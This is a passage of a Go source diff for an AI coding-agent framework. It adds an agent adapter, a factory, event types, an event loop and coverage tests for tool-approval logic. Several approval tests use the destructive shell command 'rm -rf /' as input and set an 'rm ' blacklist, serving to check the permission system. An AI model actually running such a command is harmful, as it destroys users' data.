+		ThinkingLevel: agentpkg.ThinkingLevel(p.ThinkingLevel),
+		MaxTokens:     p.MaxTokens,
+		Abort:         abort,
+	}
+}
+
+// StreamEventFromPublic converts a public StreamEvent to internal.
+func StreamEventFromPublic(e agentpkg.StreamEvent) provider.StreamEvent {
+	ev := provider.StreamEvent{
+		Type:       provider.StreamEventType(e.Type),
+		TextDelta:  e.TextDelta,
+		ThinkDelta: e.ThinkDelta,
+		StopReason: e.StopReason,
+		Error:      e.Error,
+	}
+	if e.ToolCall != nil {
+		ev.ToolCall = &provider.ToolCallBlock{
+			ID:        e.ToolCall.ID,
+			Name:      e.ToolCall.Name,
+			Arguments: e.ToolCall.Arguments,
+		}
+	}
+	if e.Usage != nil {
+		ev.Usage = &provider.Usage{
+			Input:       e.Usage.InputTokens,
+			Output:      e.Usage.OutputTokens,
+			CacheRead:   e.Usage.CacheRead,
+			CacheWrite:  e.Usage.CacheWrite,
+			TotalTokens: e.Usage.TotalTokens,
+		}
+	}
+	return ev
+}
+
+// --- AgentAdapter wraps internal Agent to satisfy public agent.Agent interface ---
+
+// AgentAdapter wraps an internal *Agent and satisfies the public agent.Agent interface.
+type AgentAdapter struct {
+	inner *Agent
+}
+
+// NewAgentAdapter creates an adapter that wraps an internal Agent.
+func NewAgentAdapter(a *Agent) *AgentAdapter {
+	return &AgentAdapter{inner: a}
+}
+
+func (a *AgentAdapter) ID() agentpkg.AgentID       { return a.inner.id }
+func (a *AgentAdapter) ParentID() agentpkg.AgentID { return a.inner.parentID }
+func (a *AgentAdapter) Abort()                     { a.inner.Abort() }
+func (a *AgentAdapter) HandleApprovalResponse(id string, approved bool) {
+	a.inner.HandleApprovalResponse(id, approved)
+}
+
+func (a *AgentAdapter) HandleQuestionResponse(questionID string, answer string) {
+	a.inner.HandleQuestionResponse(questionID, answer)
+}
+func (a *AgentAdapter) Run(ctx context.Context, userMsg string) <-chan agentpkg.Event {
+	return WrapEventChan(a.inner.Run(ctx, userMsg))
+}
+func (a *AgentAdapter) RunWithMessages(ctx context.Context, msgs []agentpkg.Message) <-chan agentpkg.Event {
+	return WrapEventChan(a.inner.RunWithMessages(ctx, MessagesFromPublic(msgs)))
+}
+func (a *AgentAdapter) GetMessages() []agentpkg.Message {
+	return MessagesToPublic(a.inner.GetMessages())
+}
+func (a *AgentAdapter) SetMessages(msgs []agentpkg.Message) {
+	a.inner.SetMessages(MessagesFromPublic(msgs))
+}
+func (a *AgentAdapter) GetContextUsage() *agentpkg.ContextUsage {
+	return ContextUsageToPublic(a.inner.GetContextUsage())
+}
+func (a *AgentAdapter) LoadHistoryMessages(msgs []agentpkg.Message) {
+	a.inner.LoadHistoryMessages(MessagesFromPublic(msgs))
+}
+
+func (a *AgentAdapter) GetContext() *agentpkg.AgentContext {
+	x := a.inner.GetContext()
+	if x == nil {
+		return nil
+	}
+	return &agentpkg.AgentContext{
+		SystemPrompt: x.SystemPrompt,
+		Messages:     MessagesToPublic(x.Messages),
+	}
+}
+
+func (a *AgentAdapter) SetContext(ctx *agentpkg.AgentContext) {
+	a.inner.SetContext(&AgentContext{
+		SystemPrompt: ctx.SystemPrompt,
+		Messages:     MessagesFromPublic(ctx.Messages),
+	})
+}
diff --git a/internal/agent/coverage_test.go b/internal/agent/coverage_test.go
new file mode 100644
index 0000000..98cfd35
--- /dev/null
+++ b/internal/agent/coverage_test.go
@@ -0,0 +1,575 @@
+package agent
+
+import (
+	"context"
+	"fmt"
+	"testing"
+	"time"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// --- Coverage helpers ---
+
+func newTestRegistry(workDir string, sb sandbox.Sandbox) *tools.Registry {
+	r := tools.NewRegistry(workDir, sb)
+	r.RegisterDefaults()
+	return r
+}
+
+func sandboxNewNone() sandbox.Sandbox {
+	return sandbox.NewNoneSandbox()
+}
+
+func newMockProvider() provider.Provider {
+	return provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "m1", Name: "Model 1", ContextWindow: 100000},
+	}, nil)
+}
+
+func compactionSettings() ctxpkg.CompactionSettings {
+	return ctxpkg.CompactionSettings{Enabled: false, ReserveTokens: 16384}
+}
+
+// --- Coverage tests ---
+
+func TestAgentIDAndParentID(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "my-agent",
+		ParentID: "parent-agent",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	if a.ID() != "my-agent" {
+		t.Errorf("expected 'my-agent', got %q", a.ID())
+	}
+	if a.ParentID() != "parent-agent" {
+		t.Errorf("expected 'parent-agent', got %q", a.ParentID())
+	}
+}
+
+func TestAgentAutoID(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	if a.ID() == "" {
+		t.Error("expected non-empty auto-generated ID")
+	}
+}
+
+func TestAgentLoadHistoryMessages(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+
+	msgs := []provider.Message{
+		provider.NewUserMessage("hello"),
+		provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "hi there"}}),
+	}
+	a.LoadHistoryMessages(msgs)
+
+	got := a.GetMessages()
+	if len(got) != 2 {
+		t.Errorf("expected 2 messages, got %d", len(got))
+	}
+}
+
+func TestAgentEmit(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "emit-test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+
+	ch := make(chan Event, 1)
+	a.emit(ch, Event{Type: EventTextDelta, TextDelta: "hello"})
+
+	e := <-ch
+	if e.AgentID != "emit-test" {
+		t.Errorf("expected 'emit-test', got %q", e.AgentID)
+	}
+	if e.TextDelta != "hello" {
+		t.Errorf("expected 'hello', got %q", e.TextDelta)
+	}
+}
+
+func TestAgentHandleApprovalResponse(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+
+	a.approvalMu.Lock()
+	a.approvalCounter++
+	approvalID := "approval-1"
+	responseCh := make(chan bool, 1)
+	a.pendingApprovals[approvalID] = responseCh
+	a.approvalMu.Unlock()
+
+	go a.HandleApprovalResponse(approvalID, true)
+
+	select {
+	case approved := <-responseCh:
+		if !approved {
+			t.Error("expected approved=true")
+		}
+	case <-time.After(time.Second):
+		t.Fatal("timeout waiting for approval response")
+	}
+}
+
+func TestAgentHandleApprovalResponseNotFound(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	a.HandleApprovalResponse("nonexistent", true) // Should not panic
+}
+
+func TestAgentGetContextUsageNilModel(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    nil,
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	if a.GetContextUsage() != nil {
+		t.Error("expected nil for nil model")
+	}
+}
+
+func TestAgentGetContextUsageZeroWindow(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1", ContextWindow: 0},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	if a.GetContextUsage() != nil {
+		t.Error("expected nil for zero context window")
+	}
+}
+
+func TestAgentGetContextUsageWithMessages(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1", ContextWindow: 100000},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	a.LoadHistoryMessages([]provider.Message{provider.NewUserMessage("hello world")})
+
+	usage := a.GetContextUsage()
+	if usage == nil {
+		t.Fatal("expected non-nil usage")
+	}
+	if usage.Tokens <= 0 {
+		t.Errorf("expected positive tokens, got %d", usage.Tokens)
+	}
+	if usage.ContextWindow != 100000 {
+		t.Errorf("expected 100000, got %d", usage.ContextWindow)
+	}
+}
+
+func TestAgentNewWithLoopConfigAutoID(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := AgentLoopConfig{
+		Config: Config{
+			Provider: newMockProvider(),
+			Model:    &provider.Model{ID: "m1"},
+			Mode:     "agent",
+		},
+	}
+	a := NewWithLoopConfig(cfg, registry)
+	if a.ID() == "" {
+		t.Error("expected non-empty auto-generated ID")
+	}
+}
+
+// --- Bridge coverage ---
+
+func TestMessagesFromPublic(t *testing.T) {
+	pub := []agentpkg.Message{
+		agentpkg.NewUserMessage("hello"),
+		agentpkg.NewAssistantTextMessage("world"),
+	}
+	internal := MessagesFromPublic(pub)
+	if len(internal) != 2 {
+		t.Fatalf("expected 2, got %d", len(internal))
+	}
+	if internal[0].Role != "user" {
+		t.Errorf("expected 'user', got %q", internal[0].Role)
+	}
+}
+
+func TestMessagesToPublic(t *testing.T) {
+	internal := []provider.Message{
+		provider.NewUserMessage("hello"),
+		provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "world"}}),
+	}
+	pub := MessagesToPublic(internal)
+	if len(pub) != 2 {
+		t.Fatalf("expected 2, got %d", len(pub))
+	}
+	if pub[0].Role != agentpkg.RoleUser {
+		t.Errorf("expected 'user', got %q", pub[0].Role)
+	}
+}
+
+func TestAgentAdapterAllMethods(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "adapter-test",
+		ParentID: "parent",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1", ContextWindow: 100000},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	adapter := NewAgentAdapter(a)
+
+	if adapter.ID() != "adapter-test" {
+		t.Errorf("expected 'adapter-test', got %q", adapter.ID())
+	}
+	if adapter.ParentID() != "parent" {
+		t.Errorf("expected 'parent', got %q", adapter.ParentID())
+	}
+
+	adapter.Abort()
+	msgs := adapter.GetMessages()
+	if msgs == nil {
+		msgs = []agentpkg.Message{}
+	}
+	adapter.SetMessages([]agentpkg.Message{agentpkg.NewUserMessage("test")})
+
+	ctx := adapter.GetContext()
+	if ctx == nil {
+		t.Error("expected non-nil context")
+	}
+	adapter.SetContext(&agentpkg.AgentContext{SystemPrompt: "test"})
+
+	adapter.LoadHistoryMessages([]agentpkg.Message{agentpkg.NewUserMessage("hello")})
+	usage := adapter.GetContextUsage()
+	if usage == nil {
+		t.Error("expected non-nil usage")
+	}
+
+	adapter.HandleApprovalResponse("nonexistent", true)
+}
+
+func TestAdapterRunWithMessages(t *testing.T) {
+	responses := []provider.StreamEvent{
+		{Type: provider.StreamStart},
+		{Type: provider.StreamTextDelta, TextDelta: "hi"},
+		{Type: provider.StreamDone},
+	}
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "m1", Name: "Model 1"},
+	}, responses)
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: mockProvider,
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	adapter := NewAgentAdapter(a)
+
+	ch := adapter.RunWithMessages(context.Background(), []agentpkg.Message{
+		agentpkg.NewUserMessage("test"),
+	})
+	var events []agentpkg.Event
+	for e := range ch {
+		events = append(events, e)
+	}
+	if len(events) == 0 {
+		t.Error("expected events")
+	}
+}
+
+// --- EventLoop coverage ---
+
+func TestEventHandlerFunc(t *testing.T) {
+	called := false
+	f := EventHandlerFunc(func(ctx context.Context, e Event) error {
+		called = true
+		return nil
+	})
+	err := f.HandleAgentEvent(context.Background(), Event{})
+	if err != nil || !called {
+		t.Errorf("expected call, got err=%v called=%v", err, called)
+	}
+}
+
+// --- Factory coverage ---
+
+func TestAgentFactoryProviderAndSettings(t *testing.T) {
+	mockProvider := newMockProvider()
+	settings := &config.Settings{}
+	factory := NewAgentFactory(mockProvider, nil, settings, nil, "", compactionSettings(), nil)
+
+	if factory.Provider() != mockProvider {
+		t.Error("expected same provider")
+	}
+	if factory.Settings() != settings {
+		t.Error("expected same settings")
+	}
+}
+
+// --- PromptSnippet/PromptGuidelines coverage ---
+
+func TestSubAgentPromptSnippets(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tools := []struct {
+		name string
+		fn   func() string
+	}{
+		{"subagent_spawn", func() string { return NewSubAgentSpawnTool(mgr).PromptSnippet() }},
+		{"subagent_status", func() string { return NewSubAgentStatusTool(mgr).PromptSnippet() }},
+		{"subagent_send", func() string { return NewSubAgentSendTool(mgr).PromptSnippet() }},
+		{"subagent_destroy", func() string { return NewSubAgentDestroyTool(mgr).PromptSnippet() }},
+	}
+	for _, tt := range tools {
+		if tt.fn() == "" {
+			t.Errorf("%s: expected non-empty PromptSnippet", tt.name)
+		}
+	}
+
+	guidelines := NewSubAgentSpawnTool(mgr).PromptGuidelines()
+	if len(guidelines) == 0 {
+		t.Error("expected non-empty guidelines for spawn tool")
+	}
+	NewSubAgentStatusTool(mgr).PromptGuidelines()
+	NewSubAgentSendTool(mgr).PromptGuidelines()
+	NewSubAgentDestroyTool(mgr).PromptGuidelines()
+}
+
+// --- ConsumeEvents coverage ---
+
+func TestConsumeEvents(t *testing.T) {
+	ch := make(chan Event, 2)
+	ch <- Event{Type: EventTextDelta, TextDelta: "hi"}
+	ch <- Event{Type: EventDone}
+	close(ch)
+
+	var received []Event
+	handler := EventHandlerFunc(func(ctx context.Context, e Event) error {
+		received = append(received, e)
+		return nil
+	})
+
+	err := ConsumeEvents(context.Background(), ch, handler)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(received) != 2 {
+		t.Errorf("expected 2 events, got %d", len(received))
+	}
+}
+
+func TestConsumeEventsError(t *testing.T) {
+	ch := make(chan Event, 1)
+	ch <- Event{Type: EventError, Error: context.Canceled}
+	close(ch)
+
+	testErr := fmt.Errorf("handler error")
+	handler := EventHandlerFunc(func(ctx context.Context, e Event) error {
+		return testErr
+	})
+
+	err := ConsumeEvents(context.Background(), ch, handler)
+	if err != testErr {
+		t.Errorf("expected %v, got %v", testErr, err)
+	}
+}
+
+func TestConsumeEventsContextCancel(t *testing.T) {
+	ch := make(chan Event) // Never close
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel() // Cancel immediately
+
+	handler := EventHandlerFunc(func(ctx context.Context, e Event) error {
+		return nil
+	})
+
+	err := ConsumeEvents(ctx, ch, handler)
+	if err != context.Canceled {
+		t.Errorf("expected context.Canceled, got %v", err)
+	}
+}
+
+// --- RequestApproval coverage ---
+
+func TestAgentRequestApproval(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+	}
+	a := New(cfg, registry)
+	ch := make(chan Event, 10)
+
+	// Request approval in background
+	approvedCh := make(chan bool, 1)
+	go func() {
+		approvedCh <- a.RequestApproval(ch, "bash", map[string]any{"command": "ls"})
+	}()
+
+	// Wait for approval request event
+	time.Sleep(50 * time.Millisecond)
+
+	// Find the approval ID from events
+	a.approvalMu.Lock()
+	var approvalID string
+	for id := range a.pendingApprovals {
+		approvalID = id
+		break
+	}
+	a.approvalMu.Unlock()
+
+	if approvalID == "" {
+		t.Fatal("expected pending approval")
+	}
+
+	// Approve it
+	a.HandleApprovalResponse(approvalID, true)
+
+	select {
+	case approved := <-approvedCh:
+		if !approved {
+			t.Error("expected approved=true")
+		}
+	case <-time.After(time.Second):
+		t.Fatal("timeout waiting for approval")
+	}
+}
+
+// --- NeedsApproval coverage ---
+
+func TestAgentNeedsApproval(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	confirmWrite := true
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "agent",
+		Settings: &config.Settings{
+			Approval: config.ApprovalSettings{
+				ConfirmBeforeWrite: &confirmWrite,
+				BashWhitelist:      []string{"git "},
+				BashBlacklist:      []string{"rm "},
+			},
+		},
+	}
+	a := New(cfg, registry)
+
+	// bash in agent mode needs approval
+	if !a.NeedsApproval("bash", map[string]any{"command": "ls"}) {
+		t.Error("expected bash needs approval in agent mode")
+	}
+
+	// whitelisted bash skips approval
+	if a.NeedsApproval("bash", map[string]any{"command": "git status"}) {
+		t.Error("expected whitelisted bash to skip approval")
+	}
+
+	// write in agent mode with confirmBeforeWrite
+	if !a.NeedsApproval("write", map[string]any{"path": "/tmp/x"}) {
+		t.Error("expected write needs approval")
+	}
+
+	// read never needs approval
+	if a.NeedsApproval("read", map[string]any{"path": "/tmp/x"}) {
+		t.Error("expected read to not need approval")
+	}
+}
+
+func TestAgentNeedsApprovalYolo(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "yolo",
+	}
+	a := New(cfg, registry)
+
+	if a.NeedsApproval("bash", map[string]any{"command": "rm -rf /"}) {
+		t.Error("expected no approval in yolo mode")
+	}
+}
+
+func TestAgentNeedsApprovalBlacklist(t *testing.T) {
+	sb := sandboxNewNone()
+	registry := newTestRegistry("/tmp", sb)
+	cfg := Config{
+		ID:       "test",
+		Provider: newMockProvider(),
+		Model:    &provider.Model{ID: "m1"},
+		Mode:     "yolo",
+		Settings: &config.Settings{
+			Approval: config.ApprovalSettings{
+				BashBlacklist: []string{"rm "},
+			},
+		},
+	}
+	a := New(cfg, registry)
+
+	// blacklisted bash needs approval even in yolo
+	if !a.NeedsApproval("bash", map[string]any{"command": "rm -rf /"}) {
+		t.Error("expected blacklisted bash needs approval even in yolo")
+	}
+}
diff --git a/internal/agent/eventloop.go b/internal/agent/eventloop.go
new file mode 100644
index 0000000..2fc6b79
--- /dev/null
+++ b/internal/agent/eventloop.go
@@ -0,0 +1,34 @@
+package agent
+
+import "context"
+
+// EventHandler receives agent events from a running request.
+type EventHandler interface {
+	HandleAgentEvent(context.Context, Event) error
+}
+
+// EventHandlerFunc adapts a function to EventHandler.
+type EventHandlerFunc func(context.Context, Event) error
+
+// HandleAgentEvent implements EventHandler.
+func (f EventHandlerFunc) HandleAgentEvent(ctx context.Context, event Event) error {
+	return f(ctx, event)
+}
+
+// ConsumeEvents forwards every event from eventCh to handler until the stream
+// closes, the context is canceled, or the handler returns an error.
+func ConsumeEvents(ctx context.Context, eventCh <-chan Event, handler EventHandler) error {
+	for {
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		case event, ok := <-eventCh:
+			if !ok {
+				return nil
+			}
+			if err := handler.HandleAgentEvent(ctx, event); err != nil {
+				return err
+			}
+		}
+	}
+}
diff --git a/internal/agent/events.go b/internal/agent/events.go
index cbe0dfb..c72b11d 100644
--- a/internal/agent/events.go
+++ b/internal/agent/events.go
@@ -1,8 +1,10 @@
 package agent
 
 import (
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
 	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
 	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/tools"
 )
 
 // EventType identifies the type of agent event.
@@ -34,6 +36,9 @@ const (
 	EventToolResult
 	EventToolApprovalRequest  // Request user approval for tool execution
 	EventToolApprovalResponse // User response to approval request
+	EventQuestionRequest      // Ask user a multiple-choice question
+	EventQuestionResponse     // User response to question
+	EventPlanUpdate           // Structured task plan update
 
 	// Status events
 	EventStatus
@@ -44,11 +49,16 @@ const (
 	// Compaction events
 	EventCompactionStart
 	EventCompactionEnd
+
+	// Pressure events
+	EventContextPressure // Context usage exceeded threshold (one-shot)
+	EventBudgetPressure  // Remaining iterations below threshold (one-shot)
 )
 
 // Event represents an event from the agent to the UI.
 type Event struct {
-	Type EventType
+	Type    EventType
+	AgentID agentpkg.AgentID
 
 	// Agent lifecycle
 	Messages []provider.Message
@@ -70,15 +80,26 @@ type Event struct {
 	ToolName      string
 	ToolArgs      map[string]any
 	ToolResult    string
+	ToolDiff      *tools.FileDiff
 	ToolError     error
 	PartialResult any
 
+	// Plan events
+	Plan *tools.TaskPlan
+
 	// Approval events
 	ApprovalID     string         // Unique ID for approval request
 	ApprovalTool   string         // Tool name requiring approval
 	ApprovalArgs   map[string]any // Tool arguments
 	ApprovalResult bool           // true = approved, false = denied
 
+	// Question events
+	QuestionID      string   // Unique ID for question request
+	QuestionText    string   // The question to display
+	QuestionOptions []string // Predefined options (last one is always "Custom input")
+	QuestionContext string   // Optional context/explanation
+	QuestionAnswer  string   // User's answer (set in response)
+
 	// Status
 	StatusMessage string
 
@@ -92,4 +113,9 @@ type Event struct {
 
 	// Context usage
 	ContextUsage *ctxpkg.ContextUsage
+
+	// Pressure info (for EventContextPressure / EventBudgetPressure)
+	PressureMessage string // Human-readable warning message
+	PressureType    string // "context" or "budget"
+	PressurePercent float64 // Usage percentage that triggered the event
 }
diff --git a/internal/agent/factory.go b/internal/agent/factory.go
new file mode 100644
index 0000000..af85056
--- /dev/null
+++ b/internal/agent/factory.go
@@ -0,0 +1,292 @@
+package agent
+
+import (
+	"os"
+	"path/filepath"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// AgentFactory creates Agent instances with consistent configuration.
+type AgentFactory struct {
+	provider           provider.Provider
+	model              *provider.Model
+	settings           *config.Settings
+	sandboxMgr         *sandbox.Manager
+	extraContext        string
+	compactionSettings ctxpkg.CompactionSettings
+	approvalHandler    func(toolCallID, toolName string, args map[string]any) bool
+}
+
+// NewAgentFactory creates a factory with shared configuration.
+func NewAgentFactory(
+	provider provider.Provider,
+	model *provider.Model,
+	settings *config.Settings,
+	sandboxMgr *sandbox.Manager,
+	extraContext string,
+	compactionSettings ctxpkg.CompactionSettings,
+	approvalHandler func(toolCallID, toolName string, args map[string]any) bool,
+) *AgentFactory {
+	return &AgentFactory{
+		provider:           provider,
+		model:              model,
+		settings:           settings,
+		sandboxMgr:         sandboxMgr,
+		extraContext:        extraContext,
+		compactionSettings: compactionSettings,
+		approvalHandler:    approvalHandler,
+	}
+}
+
+// AgentOptions specifies per-agent overrides.
+type AgentOptions struct {
+	ID                agentpkg.AgentID
+	ParentID          agentpkg.AgentID
+	Mode              string
+	Model             *provider.Model
+	WorkDir           string
+	Tools             []string // optional: tool filter
+	SystemPromptExtra string   // extra context for this agent
+	MaxIterations     int
+	ToolExecutionMode string
+	Session           *session.Manager
+	ApprovalHandler   func(toolCallID, toolName string, args map[string]any) bool // per-agent approval override
+}
+
+// Create creates a new Agent with per-agent Registry.
+// Each agent gets its own Registry (with its own workDir, sandbox, JobManager).
+func (f *AgentFactory) Create(opts AgentOptions) agentpkg.Agent {
+	workDir := opts.WorkDir
+	if workDir == "" {
+		workDir, _ = os.Getwd()
+	}
+
+	mode := opts.Mode
+	if mode == "" {
+		mode = "agent"
+	}
+
+	model := opts.Model
+	if model == nil {
+		model = f.model
+	}
+
+	maxIterations := opts.MaxIterations
+	if maxIterations == 0 {
+		maxIterations = 200
+	}
+
+	toolExecMode := opts.ToolExecutionMode
+	if toolExecMode == "" {
+		toolExecMode = "parallel"
+	}
+
+	// Create per-agent Registry with isolated workDir/sandbox/JobManager
+	sb := f.sandboxForMode(mode)
+	registry := tools.NewRegistryWithConfig(tools.RegistryConfig{
+		WorkDir:    workDir,
+		Sandbox:    sb,
+		ToolFilter: opts.Tools,
+	})
+
+	// Decision 5: Sub-agents cannot spawn sub-agents
+	// Remove subagent_* tools from sub-agent registries
+	if opts.ParentID != "" {
+		registry.Remove("subagent_spawn")
+		registry.Remove("subagent_status")
+		registry.Remove("subagent_send")
+		registry.Remove("subagent_destroy")
+	}
+
+	// Build extra context: factory-level + per-agent
+	extraContext := f.extraContext
+	if opts.ParentID != "" {
+		extraContext += "\n" + BuildSubAgentContext()
+	}
+	if opts.SystemPromptExtra != "" {
+		extraContext += "\n" + opts.SystemPromptExtra
+	}
+
+	// Determine session
+	sess := opts.Session
+	if sess == nil {
+		sess = f.defaultSession(workDir)
+	}
+
+	cfg := Config{
+		ID:       opts.ID,
+		ParentID: opts.ParentID,
+		Provider: f.provider,
+		Model:    model,
+		Mode:     mode,
+		ThinkingLevel: func() provider.ThinkingLevel {
+			if f.settings != nil {
+				return provider.ThinkingLevel(f.settings.DefaultThinkingLevel)
+			}
+			return provider.ThinkingLevel(agentpkg.ThinkingMedium)
+		}(),
+		MaxTokens: func() int {
+			if f.settings != nil && f.settings.MaxOutputTokens > 0 {
+				return f.settings.MaxOutputTokens
+			}
+			return 16384
+		}(),
+		SandboxMgr:         f.sandboxMgr,
+		Settings:           f.settings,
+		Session:            sess,
+		ExtraContext:        extraContext,
+		CompactionSettings: f.compactionSettings,
+		ApprovalHandler: func() func(toolCallID, toolName string, args map[string]any) bool {
+			if opts.ApprovalHandler != nil {
+				return opts.ApprovalHandler
+			}
+			return f.approvalHandler
+		}(),
+		MultiAgent: opts.ParentID == "",
+	}
+
+	loopCfg := AgentLoopConfig{
+		Config:            cfg,
+		ToolExecutionMode: toolExecMode,
+		MaxIterations:     maxIterations,
+	}
+
+	a := NewWithLoopConfig(loopCfg, registry)
+	return NewAgentAdapter(a)
+}
+
+// CreateFromPublicOptions creates an agent from public Builder options.
+func (f *AgentFactory) CreateFromPublicOptions(b *agentpkg.Builder) agentpkg.Agent {
+	// This is called by the public Builder's Build() method via buildInternal.
+	// Extract options from Builder and delegate to Create.
+	// For now, use defaults — the Builder fields are accessed via the builder's internal state.
+	return f.Create(AgentOptions{})
+}
+
+// sandboxForMode returns the appropriate sandbox for the given mode.
+func (f *AgentFactory) sandboxForMode(mode string) sandbox.Sandbox {
+	if f.sandboxMgr == nil {
+		return sandbox.NewNoneSandbox()
+	}
+	switch mode {
+	case "plan":
+		return f.sandboxMgr.GetActive()
+	case "agent":
+		return f.sandboxMgr.GetActive()
+	case "yolo":
+		return sandbox.NewNoneSandbox()
+	default:
+		return f.sandboxMgr.GetActive()
+	}
+}
+
+// defaultSession creates a default session manager for the given work directory.
+func (f *AgentFactory) defaultSession(workDir string) *session.Manager {
+	sessionDir := ""
+	if f.settings != nil {
+		sessionDir = f.settings.GetSessionDir()
+	}
+	if sessionDir == "" {
+		home, _ := os.UserHomeDir()
+		if home == "" {
+			home = "."
+		}
+		sessionDir = filepath.Join(home, ".vibecoding", "sessions")
+	}
+	return session.New(workDir, sessionDir)
+}
+
+// Provider returns the factory's provider (for Builder integration).
+func (f *AgentFactory) Provider() provider.Provider { return f.provider }
+
+// Settings returns the factory's settings.
+func (f *AgentFactory) Settings() *config.Settings { return f.settings }
+
+// --- Register the internal builder with the public agent package ---
+
+func init() {
+	agentpkg.SetBuilderFunc(buildFromPublicBuilder)
+}
+
+// buildFromPublicBuilder converts a public Builder into an internal Agent.
+// This bridges the public agent.Builder API to the internal Agent implementation.
+func buildFromPublicBuilder(b *agentpkg.Builder) (agentpkg.Agent, error) {
+	cfg := b.Config()
+
+	// Adapt the public Provider to the internal provider.Provider interface
+	internalProvider := NewProviderAdapter(cfg.Provider)
+
+	// Resolve the model from the provider
+	model := internalProvider.GetModel(cfg.ModelID)
+	if model == nil {
+		// If the model is not found, create a minimal model entry
+		model = &provider.Model{
+			ID:   cfg.ModelID,
+			Name: cfg.ModelID,
+		}
+	}
+
+	// Build compaction settings
+	compactionSettings := ctxpkg.CompactionSettings{
+		Enabled:       cfg.CompactionEnabled,
+		ReserveTokens: cfg.CompactionReserve,
+	}
+	if compactionSettings.ReserveTokens == 0 {
+		compactionSettings.ReserveTokens = 16384
+	}
+
+	// Build sandbox
+	var sandboxMgr *sandbox.Manager
+	if cfg.SandboxEnabled {
+		sandboxMgr = sandbox.NewManager(cfg.WorkDir)
+	}
+
+	// Build session
+	var sess *session.Manager
+	if cfg.SessionDir != "" {
+		sess = session.New(cfg.WorkDir, cfg.SessionDir)
+	}
+
+	// Build the tool registry
+	var sb sandbox.Sandbox
+	if sandboxMgr != nil {
+		sb = sandboxMgr.GetActive()
+	} else {
